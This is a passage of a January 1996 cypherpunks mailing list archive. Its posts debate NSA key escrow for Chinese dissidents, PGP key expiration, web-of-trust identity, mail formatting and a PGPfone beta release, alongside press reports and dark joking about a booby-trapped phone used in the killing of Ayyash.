delayed, and I'm waiting it out on the Net, in true geek style.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Mon, 8 Jan 1996 01:40:06 +0800
To: cypherpunks@toad.com
Subject: Re: NSA says strong crypto to China?
Message-ID: <199601071553.KAA18768@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Logically, it seems the best thing for the NSA to do (given the political
character of the group) is to send strong-but-not-that-strong crypto out. 
 
In other words, they would want the various offically-USA recognized
"dissidents" (as opposed to officially-USA recognized "terrorists") to have
crypto strong enough so that the various defined-as-repressive governments
cannot decrypt it while not-strong-enough to prevent NASA from reading it. 
-- 
     -- tallpaul 
     -- Any political analysis that fits on a bumper sticker is wrong. 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 8 Jan 1996 00:21:36 +0800
To: cypherpunks@toad.com
Subject: Re: CelBomb
Message-ID: <199601071609.LAA23989@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Post, Jan 6, 1996. By Uri Dan from Jerusalem

   Palestinian police said Ayash [The Engineer] was killed 
   north of Gaza City when he answered a call on a cell 
   phone rigged with two ounces of explosives.

   Israeli sources said the phone had been secretly traded for
   Ayash's real phone -- and the explosion was triggered by
   remote control once it was determined he was on the line.

   ----------

   No brand name given, however, another source writes that 
   Mot runs the IL cel net. So use that neat audio-vox 
   wire on MicroTAC Elites only with paid-up Shin Bet dues, 
   absent TS-immunization.













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 8 Jan 1996 03:54:47 +0800
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: phone calls from hell
Message-ID: <m0tZ0ab-00090OC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:15 PM 1/7/96 -0500, you wrote:

>SNS News Service "Exploding Phone"
>January 7, 1996..15 Teves  5756..Number 850..Update from Israel 
>It is now being reported that the cellular phone that killed him was 
>detonated by a remote control. The son of Ayyash's landlord, identified 
>as Ikrimeh Hamad, was expected to have handed Ayyash the phone 
>earlier in the day. Some reports state that his whereabouts are 
>unknown but other reports stated that he is now hiding-out in Israel. 
>>>27 Heathway Court * London England * NW3 7TS * 44-181-458-6510  
>Fax: 44-181-455-8701
> Copyright, Shomron News Service, 1996
>
>***
>
>Comment by bd:  
>
>I suppose this phone was prepared especially for Ayyash, but the 
>imagination wanders.  Imagine a world in which *every* cellphone 
>(or other net-connected computer or ....) had a little explosive built 
>in.  For that matter, the case itself could be constructed of a plastic 
>explosive.  
>
>Sure would make it easy to get rid of unwanted citizens.  
>Just match the voice pattern on the cellphone or confirm the password 
>issuing from the computer, send the special signal down the line and 
>*BOOM*, one less nuisance for the state.


Sorta gives new meaning to the term "_Terminate_ and Stay Resident" program, doesn't it?!?

(Or "end of file.")





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 8 Jan 1996 03:49:15 +0800
To: cypherpunks@toad.com
Subject: Re: "Re: NSA says strong crypto to china??
Message-ID: <2.2.32.19960107193222.009566d0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:47 AM 1/7/96 -0800, Raph wrote:

>
>   My best guess is that we're seeing a distortion of this
>interchange. If I were a Chinese dissident, I wouldn't want to use
>GAK, for three reasons: using US-lackey encryption is certainly not
>going to get you into any _less_ trouble than using independent
>encryption, if you used GAK you'd be working as a US spy whether you
>wanted to be or not, and finally, who says the Chinese can't decrypt
>it, especially with the rapid growth of television.

I can also think of another good reason that no dissident in their right
mind would want to use US escrowed GAK.  How many times have individuals
been sold out for some "greater good".  I can just imagine some dissident
getting sold out as the result of some mega-trade deal or the like.  (And I
am sure that they can too...)

Why does this news report sound more like someone trying to sell GAK to the
US public and not "chinese dissidents?



>
>Raph
>
>P.S. To those who are suriprised that I'm still here - my flight got
>delayed, and I'm waiting it out on the Net, in true geek style.
>
>
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
"Governments are potholes on the Information Superhighway." - Not TCMay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sun, 7 Jan 1996 22:33:43 +0800
To: cypherpunks@toad.com
Subject: Re: Revoking Old Lost Keys
Message-ID: <199601071215.HAA05673@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


shamrock@netcom.com (Lucky Green) writes:

>I would very much like to see expiration dates on public keys. Is PGP 3.0
>offering this feature?

I would very uch like to see PGP 3.0, but that's another story...

--Rob






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Mon, 8 Jan 1996 04:26:53 +0800
To: cypherpunks-announce@toad.com
Subject: Jan 13 CA bay area meeting - time
Message-ID: <199601072004.MAA27310@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry!   I forgot to mention that the meeting is held
from 12 noon to 6 p.m.

	      Date:  Saturday January 13
	      Time:  12 noon - 6 p.m.
  	  Location:  Building 21, Sparcy's cafeteria, Sun Microsystems
	    Agenda:  YOUR NAME HERE!  (hint hint) 
	      Food:  Bagels provided.  Feel free to bring lunch to munch.
	Directions:  Take 101 to Amphitheater Parkway.   At the 
		     end of the exit ramp, turn left at the light
		     onto Charleston.   (This street is also known
		     as Garcia.)   After about 1/3 mile, turn right
		     onto the side street.  This will be the first
		     city side street on your right, as you drive
		     down Charleston/Garcia.  In about 2 or 3 blocks,
		     you'll see purple signs for Building 21 of Sun.

If anyone driving down from SF or Berkeley can pick up Ian at the SF airport
that would be way groovy.    

Marianne
mrm@netcom.com
mrm@eng.sun.com

		





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 8 Jan 1996 03:17:00 +0800
To: cypherpunks@toad.com
Subject: Re: "Microsoft.com" added to my KILL file
Message-ID: <ad1555f91102100487cc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:51 AM 1/7/96, Lee Fisher wrote:
>| After getting another batch of bounce messages from Microsoft's
>Postmaster,
>| I have reluctantly decided to filter out all messages from Microsoft.com
>| until they fix this problem with Microsoft Exchange.
>
>I'm not in the Exchange group, not the internal operations group responsible
>for this last error, but I'll try to clarify the two issues raised by this
>thread. (But perhaps this message was pointless, as the folks I'm attempting
>to explain to have already this filtered out by their KILL file?)

I'm reading this, obviously. I use Eudora Pro, a mail program, to filter
messages into various mailboxes, based on key words in the headers. Rather
than immediately trashing messages I wish to filter out, I put them into a
mailbox I've labelled "Kill File." It is, however, just another Eudora
mailbox, and doesn't get emptied unless I explicitly transfer the files
into the "Trash" folder. (And to confuse non-Eudora users further, even my
Trash folder does not get emptied unless and until I explicitly say "Empty
Trash," as I have things configured.) This allows me, when I am bored, to
see what stuff has floated into my Kill File mailbox, and sometimes to even
respond.

My point about filtering out all Microsoft.com addresses was really to make
the point that Microsoft needs to understand--as they seem to be doing,
vis-a-vis their new Internet strategy--that if they want their mail to be
read outside of Microsoft, then they have to conform to certain emergent
standards.

...
>messages are from MSMail and Exchange clients. And while I expect that there
>are some things that our MS Mail and Exchange groups could have done better
>to introduce support for more than just ASCII messages, there is also some
>user education needed (that some forums -- such as mailing lists and
>newsgroups) often aren't the right place to post non-ASCII text like MIME
>attachments and older winmail.dat files.

This is a battle I've been fighting for roughly the past year. When I get a
blank message from someone saying only "attachment converted," I add that
username to my kill file. My feeling is that a mailing list with 1000+
subscribers, or even one with far fewer, is a terrible place to send
non-ASCII messages. Readers will be using VT-100s on campus networks, old
Amiga 1000s, EMACs, Suns, Macs, IBM PCs, Windows, and all sorts of
configurations to read mail, and there is almost no chance that all or even
most of these will be brought up to the latest MIME standards. Plain ASCII,
such as 98% of this list has been for the past several years, is the lingua
franca, the lowest common denominator (see, some number theory relevance
for you purists!) of the Net. There has been little compelling need for
embedded spreadsheets and embedded graphics. And as for attachments, such
as attaching programs for running on a machine, mailing list messages are a
very poor way to distribute such programs, for many reasons.

(Sure, a chicken-egg situation. But most of what people have to say in chat
groups, in Usenet groups, and on mailing lists is of a primarily _prose_
nature...few of us would be willing to prepare line drawings, graphs,
spreadsheets, etc., for casual posts. My hunch is that if a fully
graphics-supportive mailing list were to emerge, most people would not
generate _new_ graphics for each post (such as graphs to make a point) but
would simply clutter up their posts with cutesy logos, pictures of their
cats, etc.).)

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 8 Jan 1996 05:20:37 +0800
To: cypherpunks@toad.com
Subject: RE: "trust management" vs. "certified identity"
Message-ID: <2.2.32.19960107210215.00960a68@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:00 PM 1/7/96 -0800, you wrote:

>We already operate largely in a "web of trust" model world.
>
>Here's a pertinent example. I've met perhaps 100 people from this list,
>over the last several years. Not a single one--not even one--have I ever
>seen any "proofs of identity" for. Did I say "Not a single one"?

How many people ask for "proof of Identity" from their friends?  Not very
many, I can bet...   (Maybe the excesivly paranoid.)

>I deal with them as "persistent personnas," with either their physical
>appearances (biometric security) or their writing styles/e-mail addresses
>providing the continuity of their persistent personna.

Things like this can complicate depending on your social circles.  For those
involved in the SCA (Society for Creative Anacrnyms) or Science Fiction
conventions people may or may not go under a host of names.  You may or may
not know their "true" name.

There are people who i have known for many years who are good friends and
yet I do not know their "real" name.  (And I am not really concerned about
not knowing that name.)  Some people I know by multiple names. (Makes
conversations interesting when the nyms change every few sentences...)  What
matters is the continuity of the individual, not what nym they happen to be
using at any given point.  (The net makes this alot more complex though, as
you usually do not have visual contact with the people you are responding
to... Individuals are harder to forge than e-mail.)

The criteria I use as to whether I can "trust" a source is based on a number
of factors.  Have they given reliable information in the past?  Does the
information corilate with other information from reliable sources?  Does
their attitude get in the way of the information provided?  (Sometimes it
takes heavy filters to discern fact from opinion or just a pissy
attitude...) What gains my respect is similar, but also based on their
general attitude and how they treat people.  (Of course there is not cert
mechanism for a "web of respect".) 

[examples cliped]

>Frankly, the notion that a central government would issue proofs of
>trustability, via identity cards and the like, is a modern invention.

I find the idea that a little card "proves" my identity a bizarre form of
mystisism.  (Especially when that "proof" can suddenly expire or be revoked
by the whims of the State.)

>(The message of Vinge's "True Names" was partly ironic, that one's True
>Name is important primarily in allowing tagging by the government. 

As has been said before, one of the main reasons for the Government's (and
others) desire for "true names" is so those that offend them can be punished. 


>Ordinary
>people rarely need True Names. As I said, I've never checked the supposed
>True Names of those I deal with. Nor have most of you, I strongly suspect.
>In fact, given the way credentials can be so easily forged, I wouldn't
>trust a driver's license or even a passport. And given the government's
>ability and demonstrated willingness to generate false
>documentation--60,000 new identities in the Witness Security Program, plus
>all the spies, narcs, etc.--I even more surely don't care what official
>identification supposedly proves.)

Government paperwork proves that "they" know who you are and have some sort
of hooks into your persona.  (taxation, legal, and/or otherwise.)  This is,
of course, if it is "real" identification and not forged by a competing
interest.

>I don't want official proof of my identity. If others want it, let them
>make their own arrangements.
>
>"Papieren, bitte! Macht schnell!"

"I don't have any papers.  All I got is a pipe!"

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 8 Jan 1996 02:36:11 +0800
To: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Subject: Re: Revoking Old Lost Keys
In-Reply-To: <199601070714.CAA02909@UNiX.asb.com>
Message-ID: <199601071814.NAA04825@homeport.org>
MIME-Version: 1.0
Content-Type: text


Mutatis Mutantdis wrote:

| PGP should give a warning when the key passes the expiration date. It
| should not prevent you from using it, but should remind you that the
| key is rather old, and that the owner may have moved, etc.
| 
| Users who want to extend the life of their keys should send special
| certificates (at least once a year or every other year?) that tell
| keyservers and those with copies of their public keys that the key is
| still being used, and to update the expiration time.

	Expire should mean expire, i.e., no longer valid, useful or
useable.  If you want to have a 'depreciated after' and an expire
date, that might be useful, but it seems more like feeping creaturitis
to me.  It adds bulk to every key, when a better solution would be to
have keys automatically deprecitated some time before they are due to
expire.

	Also, the ability to extend the life of a key is fraught with
danger.  The longer a key is around, the more likely it is to become
comprimised.  The user might not be aware that the key is comprimised.
Better to have an unchangeable date.  (On a more technical level,
allowing users to change the expiry date on a key means that the key's
expiry date is not signed by the signatories, and an opponent who
comprimised a key could simply change the expiry date on that key and
send it to the servers, so that it would continue to be used, and your
opponent could continue to read all your communications.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Sun, 7 Jan 1996 10:37:40 +0800
To: jirib@cs.monash.edu.au
Subject: Re: What to do about Germany
Message-ID: <199601070223.NAA05634@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


 jirib@cs.monash.edu.au wrote:

<discussion about  german law snipped>7

>What if the laws actually contradict each other?
>
>Eg if there was a country that forbade women speaking on the net, and
>another that forbade distinctions between men and women to be made?

I guess one thing politicians should consider _real_ hard is whether they
want the Internet to be ruled by the lowest common denominator
(so to speak).

If the US (or Germany etc.) wants to impose it's version of morality/PC
then it really doesn't have any grounds to complain when other countries
decided to do so.

Mark
___
Mark Neely - accessnt@ozemail.com.au
Lawyer, Professional Cynic
Author: Australian Beginner's Guide to the Internet
Work-in-Progress: Australian Business Guide to the Internet
WWW: http://www.ozemail.com.au/~accessnt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Mon, 8 Jan 1996 04:06:45 +0800
To: cypherpunks@toad.com
Subject: Re: phone calls from hell
Message-ID: <2.2.32.19960107075136.006895e4@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:16 AM 01/7/96 -0800, you wrote:
>At 01:15 PM 1/7/96 -0500, you wrote:
>
>>SNS News Service "Exploding Phone"
>>January 7, 1996..15 Teves  5756..Number 850..Update from Israel 
>>It is now being reported that the cellular phone that killed him was 
>>detonated by a remote control. The son of Ayyash's landlord, identified 
>>as Ikrimeh Hamad, was expected to have handed Ayyash the phone 
>>earlier in the day. Some reports state that his whereabouts are 
>>unknown but other reports stated that he is now hiding-out in Israel. 
>>>>27 Heathway Court * London England * NW3 7TS * 44-181-458-6510  
>>Fax: 44-181-455-8701
>> Copyright, Shomron News Service, 1996
>>
>>***
>>
>>Comment by bd:  
>>
>>I suppose this phone was prepared especially for Ayyash, but the 
>>imagination wanders.  Imagine a world in which *every* cellphone 
>>(or other net-connected computer or ....) had a little explosive built 
>>in.  For that matter, the case itself could be constructed of a plastic 
>>explosive.  
>>
>>Sure would make it easy to get rid of unwanted citizens.  
>>Just match the voice pattern on the cellphone or confirm the password 
>>issuing from the computer, send the special signal down the line and 
>>*BOOM*, one less nuisance for the state.
>
>
>Sorta gives new meaning to the term "_Terminate_ and Stay Resident"
program, doesn't it?!?
>
>(Or "end of file.")
>

Wrong number?

Nuisance Call?

Termination of Service?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMO9fIsVrTvyYOzAZAQGIIAP/YgT7jrlyUOTLVPHn1HytkYr5PbQoeiCd
3M1n+WRXEWJAEVEDZ5+FpxKcW+5b9qXjZyeL+PmGy90xQ6LaBewQ2EIMJFw48PZw
TsZ8kalL8s2+rSOuxJJmVVBuUs3P4RzIJ0qL1A43SNf4AJb/V4COmvFf3wfHwYI0
zyfVH+435Fg=
=gQRH
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 8 Jan 1996 06:30:14 +0800
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: phone calls from hell
In-Reply-To: <Pine.SOL.3.91.960107130431.12839B-100000@use.usit.net>
Message-ID: <Pine.SOL.3.91.960107135848.11858B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



Hey - he spent so much time training suicide bombers maybe the phone was 
set to blow if anyone dialed the, er,  Samaritans.

Simon

(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Mon, 8 Jan 1996 05:27:24 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: NSA says strong crypto to china??
In-Reply-To: <ad154b940f02100416a1@[205.199.118.202]>
Message-ID: <Pine.LNX.3.91.960107140525.922A-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 7 Jan 1996, Timothy C. May wrote:

> Date: Sun, 7 Jan 1996 11:43:40 -0800
> From: Timothy C. May <tcmay@got.net>
> To: cypherpunks@toad.com
> Subject: Re: NSA says strong crypto to china??
> 
> At 10:37 AM 1/7/96, Alex Strasheim wrote:
> 
> By the way, this is related to why I think you folks should all be
> supporting the "flat tax" and similar proposals. (Especially the proposal
> to end the double taxation of corporate income: tax the company and not the
> individual shareholders, or vice versa, but don't first tax the income to
> the corporation and then tax the distributed income/dividends/capital gains
> again.)

you think that's a bit ridiculous?  i'm paid via an NIH grant given to my 
adivisor by the govt.  this stipend is taxed.  it didn't used to be 
(started to be taxed around '86  i believe).  why the hell doesn't the 
govt just save everyone the trouble and pay me less.  i'm sure they could 
get rid of a couple of IRS people this way.

-pjf

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.13 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tim Cook" <twcook@cts.com>
Date: Mon, 8 Jan 1996 06:35:58 +0800
To: cypherpunks@toad.com
Subject: Re: Another Internet Provider Censors Access (fwd)
Message-ID: <m0tZ3Qr-000V0LC@mailhub.cts.com>
MIME-Version: 1.0
Content-Type: text/plain



> The reason I bring this up is to point out that the removal of the
> alt.* groups does not necessarily mean the people removing those
> groups are trying to censor anything, but may just be trying to
> reduce the resources eaten by news on their systems and network.
> 
That is a good point Mike. From a smart business perspective though 
you would want to ask current customers to send a list of the ones 
they read BEFORE you start dropping them.

Tim Cook <twcook@cts.com>
Linux Expert (wannabe!)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Mon, 8 Jan 1996 03:58:58 +0800
To: cypherpunks@toad.com
Subject: New PGPfone Beta Test Available (1.0b5) Still Mac only
Message-ID: <ad15cfd50002100488a9@[18.162.1.1]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

MIT is now distributing a new beta test version of PGPfone. This version
(1.0b5) is not compatible with the previous version (1.0b4) and may not
be compatible with the final 1.0 release.

This version supports Macintoshes with half-duplex hardware. It also
supports secure voice communication over the Internet (the "Internet"
button that had been grayed out in earlier versions is now active).

PGPfone is being distributed both via anonymous FTP and via the World
Wide Web (WWW). The WWW retrieval path is preferred because it is much
easier to use.

U.S. and Canadian FTP users should retrieve the file /pub/PGPfone/README
via anonymous FTP from net-dist.mit.edu. It explains how to obtain the
PGPfone release via FTP. Note: The old release is still located on the
FTP site. The new version is named "PGPfone10b5.sea.Hqx."

Web users should visit the PGPfone home page located at:

                 "http://web.mit.edu/network/pgpfone/"

In addition to general information and information on getting PGPfone,
the home page also contains a link to the PGPfone HTML on-line manual.
The manual can also be found directly at:

             "http://web.mit.edu/network/pgpfone/manual/".

THE WINDOWS '95 VERSION IS EXPECTED TO BE AVAILABLE WITHIN THREE WEEKS.
However schedules can and do often change. Please DO NOT send me e-mail
requesting information on release scheduling.

I will also be releasing shortly the SOURCE CODE to this beta test
version. We (the PGPfone development team and myself) do not recommend
that people attempt to compile this source (unless you are a real
wizard). YOU SHOULD NOT ATTEMPT TO DO PGPFONE PORTS TO OTHER PLATFORMS
with this code. I say this because this is still a beta test version and
things are likely to still change significantly. If you port this source
code, you may be wasting your time! However I doubt that the basic
structure of the code will change, so you can get an idea of how it
works and how much effort a port would require.

NOTE: The FTP PGP/PGPfone distribution site has recently been updated
with a list of many more "known to be in the U.S. or Canada" domain
names. If you are a U.S. or Canadian user and you cannot get access to
the PGPfone distribution it is either because your domain name is not
known to us to be located in the U.S. or Canada *or* we could not
determine your host's domain name given its Internet address.

IF YOU CANNOT GET PGPFONE FROM US try to get it from somewhere else. I
cannot afford the time to e-mail people personal copies at this time. We
are working on alternative technology for the FTP/WWW distribution site
so that the number of bad denials (i.e., not letting people in the U.S.
or Canada get in) is reduced.

Bugs and Questions should be directed to pgpfone-bugs@mit.edu.

                                -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPAeNcUtR20Nv5BtAQEz6AP+JUSyBUGH1iZHCTxGICfcuZy4qTlDpqXJ
xUDaS6IPKJKHPj5Np0EghRQ4e5CMQcknlz4WN6G++Zoy2tMUOVkpIe20Oor/XTia
xCQVyydXDfHk0U6nv4HxVMxBajL6YSzw0Kb+L2JQDbSSbt3DGkujnT003bxvUZgi
syDfLcUl7ks=
=tiRZ
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Mon, 8 Jan 1996 06:50:09 +0800
To: "cypherpunks@toad.com>
Subject: RE: NSA says strong crypto to China?
Message-ID: <01BADD0E.00F2C220@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Alex Strasheim[

(...)But I don't necessarily look at the
NSA as an enemy.  Right now we're on opposite sides of an important issue,
and I think they're doing a lot of damage.  But I tend to think that they
believe what they're doing is in the national interest.  They're trying 
to defend democracy -- our democracy, at least.

"The" NSA is not a constant, a body which remains the same regardless of the individuals working within it.  The character of the agency, I expect, would change with the individuals.  The agency is not designed to be dangerous to citizens.  But their mileage could vary depending upon the leadership, upon their grasp of its purpose.

That's what this list is all about:  we're trying to impose certain civil
liberties on the world using a strategy that's based on anarchy theory. 
That theory tells us that if we can distribute tools and establish
standards we'll secure privacy and free speech rights regardless of what
governments do.  That's a very startling idea, and I believe it's sound. 
I believe that it's possible to impose the first ammendment on the entire
world by distributing crypto software.

But realize that these software tools and what they make possible (first amendment ideas, anarchy) are not being "imposed" - they're being selected/accepted by the users by a process of conscious individual decision, not by a blanket policy imposition handed down from 'above' (you *will* use crypto, and you *will* like it).

I don't think the NSA is out to suppress our liberties.  They're trying to
protect the nation.  Their problem is that they're operating under an old,
obsolete paradigm. (.......)

But the question is,  why are they operating under obsolete paradigms?  Why aren't they paying attention to what they are doing, to what is intelligently appropriate, to the philosophical ideals of the nation they're representing?  (and therefore who or what are they *really* trying to protect)

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 8 Jan 1996 05:45:00 +0800
To: cypherpunks@toad.com
Subject: Re: "Re: NSA says strong crypto to china??
Message-ID: <ad15795313021004d62e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:32 PM 1/7/96, Alan Olsen wrote:

>I can also think of another good reason that no dissident in their right
>mind would want to use US escrowed GAK.  How many times have individuals
>been sold out for some "greater good".  I can just imagine some dissident
>getting sold out as the result of some mega-trade deal or the like.  (And I
>am sure that they can too...)

As when the Cossacks who fled the U.S.S.R. after the war and pledged to
help the West fight Communism were returned by the British to Stalin, where
they were executed. (I was reminded of this by the latest Bond movie, where
Bond avers, "Not exactly Britain's finest moment.")

Had they been using Brit-GAK, then even more of them could've been rounded
up by the Brits and send packing.

>Why does this news report sound more like someone trying to sell GAK to the
>US public and not "chinese dissidents?

Was Noriega our friend or our enemy, and when? If his followers were using
the U.S. as their friendly keyholder, how would this have played out when
the U.S. government decided to switch sides?

When governments change, the U.S. often switches sides as well. The U.S.
holding the keys of dissidents will not fly.

The notion that the U.S. will become the GAK-holder for the world's
dissidents is too absurd to waste  more time on.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patiwat Panurach <pati@ipied.tu.ac.th>
Date: Mon, 8 Jan 1996 12:29:27 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk FAQ?
In-Reply-To: <199601060236.UAA04326@einstein.ssz.com>
Message-ID: <Pine.SUN.3.91.960107150036.241B-100000@ipied.tu.ac.th>
MIME-Version: 1.0
Content-Type: text/plain


	Is there a cypherpunk FAQ?  Or any other FAQ that gives basics on 
cypherpunk stuff, i.e., PGP, mixmaster, clipper......

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
-------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Mon, 8 Jan 1996 04:36:55 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: PGP 3.0
Message-ID: <01HZQF02DX5U95Q5Q6@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

Hello all,

I've seen a couple of messages here about possibilities of what might
be in pgp 3.0. 

I am in agreement that keys should be expirable. I produce new keys
once a year anyway. This is probably excessive given my probable
threat models, but I think it lends itself well to having a sort of
time-stamp on documents. Given that it is true that I could keep a
copy of my unrevoked key after I've formally revoked it, I still
think that it is beneficial to have signed documnents produced over
time bear keys that are time-bound at least as far as the way I use
pgp. 

The main point of this post was really to ask if there is a page or
rfc somewhere that describes what is expected to be in pgp 3.0. Is
there a particular reason that this to-be-released-with-source
program is shrouded in what appears to be secrecy?

As usual, I'm confused. It would help me greatly if I were able to
give people an idea of the added capabilities pgp will posess
whenever it is finally released. This isn't a flame as I'd like to
see it done right the first time rather than have it released then
see 4 or 5 different bug fixes quickly come out that confuse the
issue during its introduction. I found the FUD surrounding 2.6.x to
be hard to overcome with some people. <non-ob-crypto:> Heck, I found
a copy of pkz204e the other day on a pc in my office. The FUD
surrounding this product was pretty great if y'all recall. <back on
crypto:> I give talks occasionally about my company's internet
offerings for business. It would be nice to be able to speak of the
future of crypto with pgp with a bit more certainty.

Thanks for your time and consideration,

amp
<0003701548@mcimail.com> (since 10/31/88)
<alan.pugh@internetmci.com>
PGP Key = 57957C9D
PGP FP = FA 02 84 7D 82 57 78 E4  E2 1C 7B 88 62 A6 F9 F7 
January 7, 1996   15:12
 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPApK4dTfgZXlXydAQHRagf/dqF+gF41JYIBroUlmddgX6Lur3ISBxrl
MhtMAdcFzyBcRxrYIgPf+gkkzOqNSBeXHvwvZ/CWLuJpvbRXnCD0IL3hhoYGVIl5
UxvP2gh1M+wU7pEm6DYlQpq2z3OVxoG62LW6+v1YgVP6hHOEQNUYGn64TSFMDbdr
cU63c3pXLusBb6yLM5dKaPZDqo8y2YHo6hYDT21SW+Tx0MxOK7/diL9qfbBXyitk
8tmNmgti6V0MCatRAh0L4xc7kkDq33RXhyEgjTimTTwt0QIgV/QLAPN1Mdj/ZEoj
U599xGySNUfPXLwJz5mda0UDS3Pp1CNHpjdUzpFUbhDndSo1sh+ocA==
=cxUU
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Mon, 8 Jan 1996 05:46:26 +0800
To: cypherpunks@toad.com
